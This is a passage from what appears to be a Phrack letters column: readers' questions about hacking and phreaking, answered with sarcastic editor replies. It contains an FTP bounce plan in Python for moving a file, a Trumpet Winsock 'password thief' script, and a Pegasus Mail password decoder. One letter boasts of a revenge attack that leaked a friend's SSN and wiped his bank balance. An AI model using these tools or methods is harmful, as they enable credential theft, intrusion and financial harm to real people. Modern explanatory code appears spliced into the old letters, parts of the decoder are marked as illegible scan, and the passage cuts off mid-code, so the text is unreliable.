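    return ip == control_peer_ip and port >= min_port


def bounce_plan(pasv_reply: str, attacker_ip: str, filename: str) -> dict:
    """Lay out both halves of the bounce and say whether a same-origin sender refuses it."""
    ip, port = parse_pasv_reply(pasv_reply)
    port_cmd = build_port_command(ip, port)
    return {
        "receiver": ["TYPE I", "PASV", "STOR " + filename],
        "sender": ["TYPE I", port_cmd, "RETR " + filename],
        "sender_accepts": port_command_allowed(attacker_ip, port_cmd),
    }


if __name__ == "__main__":
    # Constructed sample: receiver at 192.168.1.20 opens port 1025; we talk from 10.0.0.5.
    plan = bounce_plan("227 Entering Passive Mode (192,168,1,20,4,1)", "10.0.0.5", "secret.tar.gz")
    for side in ("receiver", "sender"):
        print(side, "<-", " | ".join(plan[side]))
    print("same-origin sender accepts PORT:", plan["sender_accepts"])
```

Because the PORT target differs from the control-connection peer, `sender_accepts` is False for the sample: that is the whole 2.4.2 fix, and it is why the letter’s attack only works against the older servers.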


0x15> 
how can I phreak successfully in Germany??? 


[ The Germans hated me when I was there. I think they hate all Americans. 
Something to do with WWII or something I guess. ] 


0x16> 


Hello there :) 
Probably u don’t know who I am 


[ Definitely. ] 


well, I’m an italian boy and I wish to say ya one thing 
You’re Great. 


[ Oh. C’mon now... Really? ] 


I’ve just start to reading Phrack (the last issues) and I guess that it’s 
a very cool wonderful zine. 


[ Get out. You think so? ] 


Why am I tell ya this ?? 
Well, since I think that one person is as ya ... well he’s great. 


[ Now stop that. I’m really getting embarassed. ] 


I’m trying to learn something from ya (and I shall overcome .... I hope :) ) 
I’m interesting in hacking .. but I’m not like some other ppl that always ask 
"How can I be an hacker ??" "where I can find something to became root" 


I guess that they haven’t understood nothing 
The REAL HACKER (for me) is an expert, has an ethic and he hacks to learn 

The knowledge is one of the thing most important in the world (the other ones 
are the GIRLS =) ) 


So I won’t ask ya how to be an hacker ... (even cause you’ll probably say me 
FUCK YOU ;) ) 

we’re so far but maybe one day we could meet :) to share our knowledge 

[ Wait a minute. Are you coming on to me? ] 


Well, Thanx a lot and excuse me for all the time you spent to read this letter 
Excuse me also for my terrible english 


[ NP. Luckily Aleph1 was over, so he translated for me (’course, then I 
needed someone to translate that, too). ] 


Cool and great stuff has Phrack =) 


[ Agreed. Great stuff has Phrack. ] 


0x17> 


Hi, i noticed that you fixed up your web page, and thats nice, but my 

problem is, that when i downloaded the phrack 51 issue, it came like this 
" phrack51.tar.gz " so,....what kind of program do i use to open it? 

Can you just put all issues in zip format? That would help us all! 


[ ’Us all’? You are of course referring to the entire moron population. 
Phrack does not cater to the morons of the world, sorry. Try 2600. I hear 
their target audience is a bit thicker skulled. ] 
0x18> 




I sent you an email a while back asking you to forward a message to 

an author of one of your articles, since he wanted to remain anonymous. 
However I never got any reaction either from the author or from you. 
It’s really important for me that I find him to discuss some 
technicalities. 


The article was; "How to make your own telecards" 
Volume Seven, Issue Forty-Eight, File 10 (and 11) of 18 


Did you manage to send the mail off to him successfully? 

All I want is for him to contact me on this address (raven@swipnet.se). 
If he wants to remain anonymous he could easily create an email account 
on www.hotmail.com or another service of that kind. 

It would be very nice of you to forward this email to the author of 

the article and reply to me whether it was sent successfully or if it 
bounced back. 

thanks 


[ This is the best we can do. ] 


0x19> 


Hey there... is there any way to get phrack in just one big file instead of 
getting it in a lot of separate files? Thanks... 


Thanks, 
Crystalize 


[ `cat phrack* > master_phrack.blob` ] 


0x1a> 


im having trouble finding uk phreak iNfOs! can u help me out? im looking 4 
bt c7 info and uk payphones. cheers 


[ Hrm. I know several Brits who like me tho. And I like them, too. Much 
more than the Germans. The .uk girls are waaay prettier too. ] 
0x1b> 


HELP> Your the Best I need your help FAST 


[ AHM THE BEST!@ ] 


I have 2 files in Corel Word Perfect 7.0 that have passwords on them. I 
need them fast. Can you help? Or know anyone who can? 


I’m in the U.S. 
[ Great. We’re practically neighbors then. ] 


I will pay. I hear you’re one of the Best out there :-) 


[ AHM THE BEST!@ ] 


Melissa 


P.S. I need to try to get these by Sun. night. I can e-mail them to you? 


[ Hrm. ’Melissa’ huh... Hrm.. You’d better bring them over, this could 
take a while. ] 


0x1c> 


Just wondered why everyone raves about PGP, even though it’s breakable. 
[ What the hell are you talking about? ] 


Is it possible to by-pass ’Proxy blocks’ on an internet connection? The local 
iNet connection has blocks on all hack/warez sites whereby when you try and 
access them you get a ’You’re trying to access a filtered URL’ message. I 
figured it would be possible to re-route the connection but haven’t a clue 
how. 


[ Shure. Try some covert tunneling via IP fragmentation or IP-IP. ] 


Also, how do you find out all this stuff about tapping phones, cell-net 
busting and telephone, errr, dabbling?? Do you research it yourself or just 
accumulate it from others? 


[ Everything I know about phones is self-taught. ] 


Many thanks, 
Denyerec 


0x1d> 


Hi, 

I’ve been reading a lot of phrack zines lately and seeing your name 
in most of them, I thought you’re the best to answer my questions ??? 

To become a hacker where do I start ? 


[ New Zealand. Or at least as far away from CA as possible. ] 


What books should I read ? 


[ Anything by Stevens/Knuth or any of the millions of smarter-than-you people 
out there. It’s a safe bet that, if they wrote a book, they’re smarter than 
you. Very safe bet. Like, Fort Knox safe. ] 

What languages do I have to learn ? 


[ English is a good start. ] 


Which sites are the best to go to for information on hacking 
(including newsgroups) ? 


[ Anything in the alt.* hierarchy is a good plan. It’s ALL *choice* 
material. ] 


I’ve only started hacking and that’s into applications on my 
computer and my friends computers. 


[ That’s nice. ] 
I hope I’m not bothering you with this message. 


[ No bother at all. I’m shure you’ve made someone smile, somewhere. ] 


0x1e> 


Dear Phrack, 

I’m looking for a phreak to work in France and I couldn’t find such 
informations on the Net; so, is there any chance that blue box may work in 
France, or the Phoney app which comprise red, blue, green, and black boxes, 
and if so it is, how does it work ? 
Also, is there any site on the Net where I can find information and tools 
for phreak in France? 


Thank you so lot by advance for your advices. 


[ Now, I don’t know any French people, but, I think if I met some, they 


would like me. I don’t give into all that ’French people suck’ propaganda. 
Nono. I think they rock. And the French women are really pretty, too. ] 
0x1f> 


I use a macintosh when I ip spoof. Please, if you use a macintosh, send 
me a hacked version of TCP/IP and/or a hacked version of Open Transport. 
thanks. 


[ You’re neat. Let’s be pen-pals. ] 


0x20> 


Hello! 


Sorry for boring you, but I’ve some problems with L2 on FreeBSD-2.2.1R 
and decide to ask you about some tech details. 


The problem is that ’loki’ unable to receive ICMP_ECHO packets from 
‘lokid’. I dig through kernel netinet sources and AFAIK, there is no way 
to pass ICMP_ECHO packets to userland. In ip_icmp.c we have: 


ICMP_ECHO->icmp_input()->icmp_reflect()->ICMP_ECHO_REPLY->icmp_send()->net 


So, there is no chance to receive ICMP_ECHO in application program, isn’t 
it?! Unfortunately, I’ve no access to Linux box, so I can see what’s 
happen there. 


[ You are correct. In the accompanying paper I allude to this problem. Net/3 
based stacks will not pass ICMP request packets to userland. ] 


Is there are any workarounds? I can patch my kernel, but I think this is 
not right way. What do you think about this? 


[ Running the client and daemon on Net/3 boxes is a problem. ] 
p.s. The idea of patch is simple - create copy of packet’s mbuf via 


m_copy(), send it to rip_output() and only after that pass original packet 
to icmp_reflect(). 


[ Cool! Write the patch up and I’11 publish it in a future issue. ] 
Regards, Roman. 


0x21> 


I would like to put a request out for all so called "hackers" to join up i 
can’t find nobody to talk to in this Hellhole Richmond, Virginia I want to put 
a message up for all VA area code 804 hackers that live near richmond to 
email me at DrMischief@juno.com . Thanx 


Thanx, 
Mischief 


ALIAS: DrMischief 
[ Here’s your chance. ] 


0x22> 


Let me start by saying your magazine is great. I read it whenever I have 
time. I am a newbie and want to know if you know anyone who could help me 
get started who lives/operates in the Morris County, NJ area. 


The Gator 


P.S. If you know anyone using the handle ’The Gator’, can you please tell 
me so I don’t offend anyone. 


[ You mean you haven’t checked in the official codename repository? Oh boy. 


I don’t envy you. ’The Gator’ is one of the most sought after nicks in the 
history of nicks! You’re in for it now. God help you. ] 

0x23> 

Hello! 


Thanks for such a good e-zine. It has a lot of relevant articles, 
and it helped me start hacking. Again. thanks for that. 

I was wondering one thing, however: do you know anything about the 
Mentor? He wrote the Hacker Manifesto, and I believe he wrote an article for 
phrack once...... Could you give me any help, please? I’m doing this for a 
school project.... 


[ I hear the mentor joined a new wave band and changed his name to Bobbysox. ] 


0x24> 


Where can I find a sshd.c trojan? 


[ http://www.cs.hut.fi/ssh/#current-version ] 


0x25> 

I’d like to know if someone of you ever made some compiling in 
C (I’d like something for you) thank’s 

[ Huh? ] 

0x26> 


Hi, I need a FALSE IP APP: Can You Help ME? 


[ NO I can’t HELP you AT all. ] 


0x27> 


I heard that a Phrack magazine issue talks about hijacking sessions, which 
one is that issues? I can’t find it. 


[ P50-06 ] 


0x28> 


I’m trying to reach all the real hackers and phreaks (not stupid warez 
lamers) in the 601 area code, especially those around Lauderdale county, 
so I figured Phrack would be a good place to start. 


A few friends and I are gonna be starting some get-togethers at the new 
Bonita Lakes Mall in Meridian when it opens up later this October 
(probably long past by the time the issue of Phrack this will be in 
comes out). 


All fellow readers interested in reviving the HP scene in the East 
Mississippi-West Alabama area are welcome to come (reviving assumes that 
there was ever a scene here in the first place. We’re quite boring 
hicks in this part of the country). 


If you’re planning on coming, or want more info, please E-Mail me at 
weaselsoftware@hotmail.com 
Even if we just have the locals, we should have a lot of fun, so if all 
goes well, I just might be writing an article for Phrack about it, if 
ya'll would be interested. 


[ We wouldn’t be. Ya’ll. ] 


Cheers, 
-|/|/easel 


0x29> 
I have a few questions about Juggernaut: 
1) can it capture ethernet packet ? 

[ It can capture many. ] 

2) can it act like sniffer ? 

[ Shure. ] 

3) which compiler 

[ GNU C compiler ] 

4) does it have to run on root 

[ No, it has to run as root. ] 

5) which platform does it work on? 


[ Linux (legacy version) Linux, BSD, Solaris (current unreleased version) ] 


0x2a> 


You could say I’m a newbie or novice. I would be very grateful if you 
could send info on anything on beginning hacking. Like what computers are 
the best and what additional accessories you need. So in short please send 
any info you could. Thanks. 


[ WHAT AM I DOING? I AM PUBLISHING PHRACK. WHAT IS PHRACK ABOUT? PHRACK 
IS ABOUT DISSEMINATING ENTROPIC INFORMATION TO ANYONE WHO WANTS IT. ARE 
YOU CONFUSED? IT WOULD APPEAR SO. ] 

0x2b> 

I have heard about your magazine. I am not new but I am not experienced 

to this side. Would you please guide me to where I would begin. 

pool 

[ P51-02@0x2a ] 

0x2c> 

Kong-ratz Guyz! You made it onto C|NET Last night at 10 on (Sept) the 5th. 

They were bashing you! Damn..... Well thats it. C-ya! 

[ Hrm. ] 

0x2d> 

After reading Phrack for years and being in the computer industry for 

18+ years, I thought it was time that I write in. I have been reading Phrack 

for about 6 years now. Even talked to Erik Bloodaxe a few times in 

regards to Banyan Vines a couple of years ago when I was in the military. 

The scene seems to have changed so much now. It used to be full 


disclosure for the most part. Now everyone is so paranoid of sharing what 
they know, since everyone will rush a patch out for the latest exploit. 
How do you think others learned? Hacking is and always will be about 
exploring the limits of systems and networks. As you learn and share, 
others can expand their knowledge base. I started back on Atari 400s 
years ago coding in BASIC. I know many will laugh at that very thought, 
but it was a start. The groups back then were very tight, but also 
willing to help each other. If you showed a willingness to learn, and 
took the time to learn, instead of just leeching, it was amazing what 
others would do to help you. 


I have been digging through tons of sites lately, most are outdated hacks 
from what I have seen. Most places patch as fast as something hits the ’Net. 
But at least you can learn from the code if you take the time. I want to 
send congrats out to Phrack. You guys along with a handful of others make it 
a point to keep sending things out to us in the community. One of the 
comments I am sure to hear is, then why don’t you contribute things? I have 
not to Phrack directly, but that will change soon. I don’t have a lot that is 
that great, that hasn’t been patched for already. Mine is more tinkering and 
learning. Anyway, I am sure I have rambled enough for now. Just thought I 
would give my $.02 worth. Keep up the good work at Phrack! 


L8R, 


D-Man 


0x2e> 


I am looking for a REALLY good telenet software and an also REALLY good 

[ I like the telnet software that comes with 4.4BSD. ] 

scanner software. Can you refer me anywhere? 

[ Scanners was a terrifying movie! Why would you want to scan someone?!@ ] 


I also would like to know how you decode the password in the passwd 
file. 
For example it writes: 


john:x:9999:13:John Johnson:/home/dir/john:/bin/john 

[ ’x’ is a shadow password token. It cannot be decrypted. Furthermore: 

Unix passwd encryption is based on a modified version of DES. The user 
enters her login and password at the prompts. The user entered password is 
used as a key to encrypt a 64-bit block of NULLs. The first seven bits of 
each character are extracted to form a 56-bit key. (The other eight are 
used for parity.) This implies that only eight characters are significant to 
a password. The E-table is then modified using the salt, which is a 12-bit 
value, coerced into the first two chars of the stored passwd. The salt’s 
purpose is to make precompiled passwd lists and DES hardware chips 


ineffectual (or more difficult to use). Then, DES is invoked for 25 
iterations on the block of zeros. The output is 64-bits long, and is then 
coerced into a 64 character alphabet (0-9, A-Z, a-z, ".", "/"). This 


involves translations in which several different values are represented by 
the same character. Unix passwd crypts are the product of a one-way hash. 
Information about the key is dropped in every iteration. Bits are LOST in 
the process. crypt(3), therefore, CANNOT be decrypted, reversed, or 
otherwise subverted from any type of scrutiny of its output. ] 
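The key and salt handling the reply describes, as an added example that is neither crypt(3) itself nor code from Phrack: DES is left out, so nothing here produces a hash. It shows the two properties a practitioner actually checks, that only the low 7 bits of the first 8 password characters ever reach DES and that the 2-character salt carries 12 bits, and it classifies the second field of a passwd line like the one in the letter (shadow token, lock marker, or 13-character DES crypt). The alphabet and bit widths follow the reply; the passwd lines and the 13-character hash are constructed.

```python
from typing import Dict

# The 64-character salt/output alphabet named in the reply: ".", "/", 0-9, A-Z, a-z
ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def des_key_bits(password: str) -> int:
    """Pack the low 7 bits of each of the first 8 characters into a 56-bit key.
    A short password is zero-padded; character 9 onward never reaches DES."""
    raw = password.encode("latin-1", "replace")[:8].ljust(8, b"\0")
    key = 0
    for byte in raw:
        key = (key << 7) | (byte & 0x7F)  # the high bit is dropped (DES parity position)
    return key


def same_des_key(a: str, b: str) -> bool:
    """True when crypt(3) would feed DES the identical key for both passwords."""
    return des_key_bits(a) == des_key_bits(b)


def salt_value(salt: str) -> int:
    """Decode the two leading hash characters into the 12-bit salt (6 bits each)."""
    if len(salt) != 2 or any(c not in ALPHABET for c in salt):
        raise ValueError(f"salt must be two alphabet characters: {salt!r}")
    return ALPHABET.index(salt[0]) | (ALPHABET.index(salt[1]) << 6)


def classify_passwd_field(field: str) -> str:
    """Say what the second field of a passwd line is: shadow token, lock, or hash."""
    if field == "x":
        return "shadowed"          # the real hash lives in /etc/shadow
    if field == "":
        return "empty"             # no password at all
    if field[0] in "*!":
        return "locked"
    if len(field) == 13 and all(c in ALPHABET for c in field):
        return "des-crypt"         # 2 salt chars + 11 hash chars
    return "other"


def inspect_passwd_line(line: str) -> Dict[str, object]:
    """Parse one passwd line and report the hash field kind and salt (DES crypt only)."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        raise ValueError(f"expected 7 fields, got {len(parts)}: {line!r}")
    kind = classify_passwd_field(parts[1])
    return {
        "user": parts[0],
        "kind": kind,
        "salt": salt_value(parts[1][:2]) if kind == "des-crypt" else None,
    }


if __name__ == "__main__":
    # Constructed sample lines; the 13-character hash is not a real crypt of anything.
    print(inspect_passwd_line("john:x:9999:13:John Johnson:/home/dir/john:/bin/john"))
    print(inspect_passwd_line("jane:ab3Xq9vLm2pQw:1001:100:Jane:/home/jane:/bin/sh"))
    print("password1 vs password2 share a DES key:", same_des_key("password1", "password2"))
```

`same_des_key("password1", "password2")` is True, which is the practical consequence of the eight-significant-characters rule: a cracker only ever needs to guess the first eight, and a password policy that counts characters past that point is counting nothing.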


0x2f> 


To the Editor: 


I have to give out props to the job done on Phrack51..... it just keeps 
getting better and better. I’ve enjoyed Phrack 1-50 but i must say that since 
the current staff of the mag took over I’ve really noticed a marked 
improvement in the quality and content of the articles. Thanx for making this 
magazine available to all of us out here who are reading and learning But just 


NMEwithin 


[ http://www.infonexus.com/~daemon9/PIX/milla4.jpg ] 


0x30> 


a story of adolescent revenge..by a not so adolescent at 3:37 am 


[ Be warned. This is long. ] 


So here i sit surrounded by an ashtray full of butts, empty beer cans, empty 2 
liters, a giant pile of papers, a stack of cd’s, dirty dishes, tangled cords, 
red and green lights, the ticking of the furnace and blurred vision. Just got 
back from the pool hall and pissed off. why? because an old friend is getting 
married tomorrow and I was not invited. Well WAS a friend is more to the point. 
Betrayal in any form is a great primer for hatred. I am a twenty something 
(hate that fucking phrase) loser with no clue on what the future holds..but I 
find pleasure in figurative masturbation with MY processor. Match wits with 
this bitch, tell IT what to do and make it my slave...cheap thrill. Having 
power over something or someone is great while it lasts..as long as you do not 
have a conscience. But I was wronged, so it is justified..my actions I mean... 
right? My girlfriend is asleep upstairs and thinks I sit up at nights doodling 
to porn sites. I tell her that my pc is not working right, so that is why I am 
always working on it...that fucker bill gates. If he was as smart as the world 
believes he is, these activities would not be so easy. Back to the point. 
(sorry! had a few too many). So I sign on...search for allies, find them among 
other assholes that have somehow learned one of my handles. My buddies are up 
to some funny shit, not total anarchy, but funny none the less. So what do I 
do...I tell them that I am in a bad state of being at the moment..they ask why, 
"Time for pain!" is what I read. You know how it is. A friend since first 
grade on through college just fucked you for the 100th time. I feel sick about 
it, but none the less it’s time to put to work the tricks of the trade. I give 
my TRUE friends the skinny on my intentions, they oblige with laughter and 
frothing mouths. I cough up his SS#, home, phone, bank, work, license, and 
online accounts. Too late to turn back now. It’s funny how one will actually 
take the gas pipe for virtual strangers that one has formed an online bond 
with, and will enlist them in a scheme to fuck a real time friend. (ex-friend). 
Number one, divide up the tasks. Number two, failure is NOT an option. Number 
three, ruin wedding. So here we go...secretary of state was a blow off, no 
brainer. PhoneCo a bit tougher (but been there before). Bank..oh the bank.. 
online banking 24/7 was such a good idea. My collective cohorts and I were 
like pitbulls fighting over the neighbors cat. Giggling like schoolgirls. HI 
we are elite! or so we think..most of our shit (not all) was built by others 
before us. We did modify code, but the backbone was not our own. Now it is 
4:30 am and the shit is flying...after reading the "underground" being a 
martyr seems cool. My head is spinning, but I have to remain focused at all 
times..it is hard. Account activity...money is due to the banquet facility 
tomorrow. At least the balance of the shindig after the initial deposit. Check 
numbers and cleared transactions. He has no fucking clue! The best part was 
that he had mentioned writing a check for his balance only one day before.... 
but the amount owed was not cleared yet on his account. So time to insert! 
--0.00 balance. Too easy. OK, fine. Just a bounced check to deal with. Phones 
turned off (scheduled termination for lack of response to notices sent). Oh 
yeah..did I mention Utilities? Bank takes care of payment...how convenient. 
Car payments, insurance, mortgage the whole nine. Zip, Zero, Zed. A repeater. 
Constant (0.00). I am an asshole, I know, but being fucked by a "FRIEND" is 
troubling and unforgivable in this situation. One more thing..Company Voice 
mail...fucked. Left a text to speech recording to boss, too funny and 
implicating to dillhole. It’s like giving beavis and butthead a small piece of 
gray matter that works for only bad things. I should have been invited to this 
wedding, but never the less, he is marrying a whore. This may sound vindictive 
or like sour grapes, but totally true. So actually we are doing him a service, 
he just does not know it. The "ruin the wedding" part is actually out. It will 
happen and the avalanche of our actions will not start until the following 
week. But at least i did something, right? What a stupid thing to concentrate 
on. I am an idiot with things I should not have. Most of my collective friends 
are striking political targets...I am bouncing a check. But I am over it now. 
Time to sit back and wait...wait for the phone call from a mutual friend to 
give me the dirt. I guess I am the type of guy that would get a boner if I 
reset his sprinkler timer to go off when he is trying to get in his car. 
Totally retarded, but I would laugh for days. Whats wrong with me? I am now 
sitting here in my self-made dungeon scratching my head saying to myself "boy 
that was way harsh". I know some people would pose the question, "what did he 
do to deserve this type of retaliation?". You know what it’s like, you have 
been there at one time, and everyone reaches a point where counter measures 
are warranted. Case closed. What we did was but an inconvenience, but will be 
remedied. Nothing was left beyond repair. It’s at these times! (no matter how 
trivial) you find out who is willing to take a bullet for you. And in some 
fucked up way, that is important. At least it is to me. it’s 7:49 am and time 
for the sandman. 


SychoSis The Collectiv 


[ I am not sure which saddens me more, the fact that you actually spent several 
hours writing this, or the fact that I spent several minutes reading it. Now 
Phrack’s loyal readers can feel my pain and read this for themselves. ] 


0x31> 


To whom it may concern: 


I believe that I submitted an article to your publication on hacking the 
phones at your local WAL*MART, please be advised that I submitted the 
same article to 2600 magazine and blacklisted 411, however I submitted 
the article to 2600 magazine before yours or blacklisted, they have 
decided to publish my article, and therefore I wish to inform you of 
this so there is no confusion. 


Thank you for your attention, 


Pirho 
Brought to you by Pirho and the International Brother Hood Of Frat 
Houses. 


[ We can only hope that your article brings Emmanuel and the rest of the 2600 
editorial team as much amusement as it brought us. Not from going and 
harassing people at Walmart, no. Mostly from laughing at you for writing 
it. We’ll leave the articles on hacking things like Walmart and Disney 
World for publication by 2600. We like to think we still have a reputation 
for quality. -alhambra ] 


0x32> 


Dear..sir 

I had readed yours doc.I’m interesting 
about hacking art and learing it.I would like 
to ask you.How can I hack my ISP?It’s dumbing 
I know.But I don’t know to ask anybody. 


[ I wonder if the aleph1speak to English translator has a ’Yoda setting’... ] 


0x33> 


Hey, I just finished a two hour picture tour at your webpage, looked at 
every single photo hosted there, I know for one thing, with all the 
film you have used, Kodak must love you! The pic’s were a riot, matter of 
fact, I almost had an accident in my pants I was laughing so hard. Seems 


[ Maybe you should get some rubber pants or those adult diapers. ] 


like you and your friends know how to have fun (my kind of people) all we 
have up here is half-wit clowns. Anyway, enuf with the bullsh*t, 
I just wanted to ask you who owns "INN", if it is you, how did you pay for 
all that hardware? Where are you located, Cali I assume? How old are you? 
Any chance of meeting somewhere to chat one day (IRC)? 

If it’s too personal, I understand, if not, reply... 


[ Are you coming on to me? ] 


Regards -Tyrant 


0x34> 
[ ...Regarding the ’Teardrop’ IP fragmentation bug... ] 
Dear To whom it concerns, 

I do not think you should have posted this about your bug you found. 


A lot of maniacs got a hold of it and are crashing servers everywhere. The 
net has turned into anarchy. I have about 4 servers down that i patched. But 


[ The Internet is anarchistic by nature. ] 

the patch doesnt seem to work. 

[ The patch works fine. Perhaps it is you that is broken? ] 

I do not think you should have posted that publically like that. 


[ Thanks. I’ll make sure to file your opinion in the ignorance-folder. ] 


0x35> 


I’m just wondering when is defcon and where can I find out about little 
bit more? 

Regards. 

Pav. 


[ Defcon is traditionally held during the Summer in Sin City. Damn I love 
that town. http://www.defcon.org for more info, although the future of 
this Con is in question. ] 


0x36> 


Where can I find ways to make Long Distance phone calls without getting 
billed (and preferably without making any boxes?) 


[ A phone line for which you do not pay the bill. ] 
I’m not an idiot, I just thought I’d ask. :) 
[ Is that open to conjecture? ] 


0x37> 


To Whom It May Concern: 


I enjoy reading your stuff in Phrack and I pay attention to those stuff 
that is written about unix reading stuff. I am just wondering if there is any way 
to play tricks or hack linux 1.2.13. It also runs pine under it and I think 
there is a trick with .rhosts in pine and ls /tmp. Could you please tell me 
more stuff about this?? I could download the /etc/passwd file but then I have 
to use a dictionary to hack it and is there a way of hacking it without using a 
dictionary?? And how do I delete my last login file?? Thanks!! 


Your Truly 


Tag 
[ Linux 1.2.13 is one of most impenetrable versions of Unix out there today. 
Not only is the Linux O/S renowned for its stalwart and impenetrable security 
but the 1.2.13 kernel was where Alan, Eric, Linus and the rest of crew 
peaked. That kernel revision is all-but immune to every known form of 
attack (with the possible exception of quantum state disassembly). Your 
best bet is to kill yourself now. ] 


0x38> 


How ye all doin there at Phrack, hope your all keepin well. 


Anyways before I say anything I’ll admit it, I’m a newbie, not a lamer a 
newbie. I’ve read all the hacking files I can get my hands on. There’s only 
one small problem...I live in Ireland. A few weeks ago I was given an article 
written by "Hackwind" (1992 I think) about the hacking scene in Ireland. 
Believe you me. It’s even worse than he says it is. The main problem is that 
all the files written don’t relate to Ireland in any way . I don’t even know 
ONE bbs in Ireland and NO ONE I have spoken to does either. I don’t expect you 
to know much about the hacking scene in Ireland but if you do know anything, 
anything at all could you please send it to me. I’m dying for information. 
Information that I can’t get my hands on. If you don’t know anything about it 
perhaps you know of some contacts. 

Please let me know. Cheers, 


NO_eCHO 
PS. Keep up the good work at Phrack. 
[ Ok, someone in Ireland help this guy out. ] 


0x39> 


hello my name is FUSION from a group called digital elite alliance and i 
was wondering if you would like to become allies with us. If so e-mail me back 
at XXXX@prodigy.net and then i’ll get back to you. 


[ Don’t hold your breath. Wait. On second thought, do. ] 


0x3a> 


Daemon9, 

Hi! I’d like to ask you a very common question. Maybe everyday you have 
received mails asking it. Yes, what I want to know is how to become a great 
hacker. 


[ Swing from the shoulders, not from the arms. ] 


I am a freshman in university. I wanna to be a hacker, not for doing 
damage to others, but in my own view, being hacker require a lot of 
knowledge and creative. I aim at knowledge and want to find out new tech, 
while not just using others’. In fact, I have read many articles about how 
to become a hacker. And I have done them. 

Now, I have mastered C, unix shell, and some of TCP/IP. 
So what should I learn if I want to be a great hacker like you? 


[ If you have mastered the aforementioned topics, you are far greater than I. ] 


I am learning socket programming and IP-spoofing now, do you have any resource 
on the net to recommend to me? 
Please write me back. Hoping to hear from you soon. 


Liu Jiangyi 


Daemon9, 
Hi, I forgot to ask you another question. Should I join a hacker group? 
And have you joined it? If so, please tell me which group I should join. 
And the mailing list, which one should a hacker join in your own view. 
Hoping to hear from you soon! 


Liu Jiangyi 


0x3b> 


[ A few letters to nirva and I. I swear to GOD these aren’t made up. I 
*couldn’t* make stuff like this up. ] 


Hey Route, 


I was wondering if you knew what colours Nirva dyed his hair for 
defcon and who made the dye, I was also wondering if you had a copy 
of LISP lying around somewhere. Are you going to the KMFDM concert 
this friday by any chance? I was wondering if you have ever been bust 
for hacking or phreaking and how you manage to hack with the constant 
surveillance by the man? Also if you don’t mind telling me, how did 
you get into hacking and did you have a mentor at any stage? 


Ciao and thankx 


Hey Nirva, 


I was wondering how you got Real Kitty to drink coke out of those 
bottles from McDonalds (or is he just chewing on the straw). I was 
also wondering who Mike is currently going out with, not to mention 
you as well? If you could do me a favour and try to convince Mike to 
give me some webspace as well, I would really appreciate it. 


Thankx and Ciao 


Hey Mike, 


How would you like to win a date win with carmen electra, if you 
would like to, go on over to durex.com and there’s a link from there 
to the american site with the entry form to win the date, and being 
such a brilliant hacker I don’t see how you couldn’t manage to rig 
the contest ;) 


Thankx and Ciao 


0x3c> 


Arggh, think of me what you will, but I can't get over a pic on yer 
site of nirva, prolly one of the 133t3st looking individuals I've seen, 
in personal appearance (no, I ain't gay), but anyway .. what are those 
things on his arms? I saw that photo with the caption "nirva has 
rickets" or something, but are they implants? ie part of his 
image/appearance or were they some sort of weird disease he picked up? 


[ Due to the vitamin-D embargo of 1975 - 1978 in New Mexico, nirva contracted 
the rare disease osteomalacia (rickets). He has it mostly licked these 
days thanks to heavy amounts of vitamin-D laced EMF radiation treatment he 
undergoes 2 times a week. Every now and then, however, he lapses, as you 
can see from the aforementioned picture. ] 


tah man .. great page btw 
speaxx 


0x3d> 


EOF 
[ Various ] 


Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I 
felt obligated to share a small piece of code that I don't like to admit 
that I created, far earlier than the esteemed Jeep's published work. As his 
requires access to a Pascal compiler and does not seem to be coded with 
portability in mind, the fact that my script requires Trumpet itself to run 
does not seem too great a hindrance. The irony is that not only is the 
"cipher" a simple obfuscating XOR, but that Trumpet itself will decode it 
for you. 


<++> password.cmd 
# Put in Trumpet Winsock directory, run under "Dialer/Other" 
# Cannot currently use any file other than trumpwsk.ini, 
# apparently due to implementation errors in the "load" function 
display \n 
display "Trumpet Password Thief 1.0, 8-18-95"\n 
display \n 
if [load $username] 
  display "username: " 
  display $username\n 
else 
  display "ERR: cannot load username"\n 
end 
if [load $password] 
  display "password: " 
  display $password\n 
else 
  display "ERR: cannot load password"\n 
end 
display \n 
<--> 
-- anonymous 


0x2> 


Another password decoder for ya... written long ago, I just never bothered to 
release it... 


<++> peg-dec.c 

/* 
 * Pegasus Mail Password Decoder v1.0 by Belgorath 
 */ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

/* Decoding/Encoding Tables: one table per password length, indexed by 
 * character position.  Only dec1, dec4 and dec7 are legible in this scan; 
 * the other tables are declared without values (the scan's garbled text is 
 * kept in the comment) and must be filled in from an original copy before 
 * the decoder is useful for those lengths. */ 

int dec1[1]= { 44 }; 
int dec2[2];                          /* scan illegible: "LG: 2d" */ 
int dec3[3];                          /* scan illegible: "LO g DZ pr 28s ah" */ 
int dec4[4]= { 37, 28, 21, 7 }; 
int dec5[5];                          /* scan illegible: "21, 22,7 31; 28, 9 4" */ 
int dec6[6];                          /* scan illegible: "22, 13? 28; U4, Ly 2s, Kj" */ 
int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; 
int dec8[8];                          /* scan illegible */ 

int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 }; 

/* Subtract the table entry for this password length and position, then 
 * wrap the result back into signed-byte range. */ 
int decode_char(int numch, int ch, int pos) 
{ 
    ch-=decz[numch-1][pos-1]; 
    if (ch<-127) ch+=256; 
    return ch; 
} 

int main(void) 
{ 
    int x, nc; 
    char *tz, *p; 
    int inps[20]; 

    nc=0; 
    tz=malloc(8192); 
    if (tz==NULL) return 1; 
    memset(tz, 0, 8192); 
    printf("Enter Pegasus Mail Password: "); 
    if (fgets(tz, 8192, stdin)==NULL) return 1; 

    /* Fun input parsing loop: the stored password is a list of numbers. 
     * The separator character is illegible in this scan, so both a space 
     * and a comma are accepted here.  At most 20 numbers are kept. */ 
    p=tz; 
    while( *p && nc<20 ) { 
        inps[nc++]=atoi(p); 
        while (*p && *p!=' ' && *p!=',' && *p!='\n') p++; 
        while (*p==' ' || *p==',' || *p=='\n') p++; 
    } 

    /* Throw away anything past the end */ 
    for (x=0;x<nc;x++) if (inps[x]==-1) { nc=x+1; break; } 

    /* All pegasus passwords end in -1 */ 
    if (nc==0 || inps[nc-1]!=-1) { 
        printf("Invalid Pegasus Mail Password.\n"); 
        return 1; 
    } 

    /* But we throw it away anyway */ 
    nc--; 

    /* Only lengths 1..8 have decoding tables */ 
    if (nc<1 || nc>8) { 
